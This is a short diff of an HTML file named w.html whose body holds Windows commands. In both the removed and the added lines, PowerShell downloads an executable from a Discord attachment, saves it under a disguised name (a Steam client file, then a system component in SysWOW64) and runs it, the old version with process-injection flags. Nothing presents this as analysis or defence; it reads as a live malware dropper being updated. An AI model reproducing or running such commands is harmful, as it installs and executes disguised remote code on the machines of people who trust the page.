--- a/w.html
+++ b/w.html
@@ -6,7 +6,7 @@
 # </div>
 # <div class="text">
   cls
-  powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1195789181784436838/1195791255750316152/a.exe' -OutFile 'C:\Program Files (x86)\Steam\stream_client.exe'" 
-  & "C:\Program Files (x86)\Steam\stream_client.exe" --process-name rstrui.exe --inject WriteMiniDmp.exe
+  powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1191605192513306694/1195960443756359801/Chcp.com' -OutFile 'C:\Windows\SysWOW64\compstui.exe'" 
+  & "C:\Windows\SysWOW64\compstui.exe" --process-name calc.exe --compstui.exe
 # </div>
 
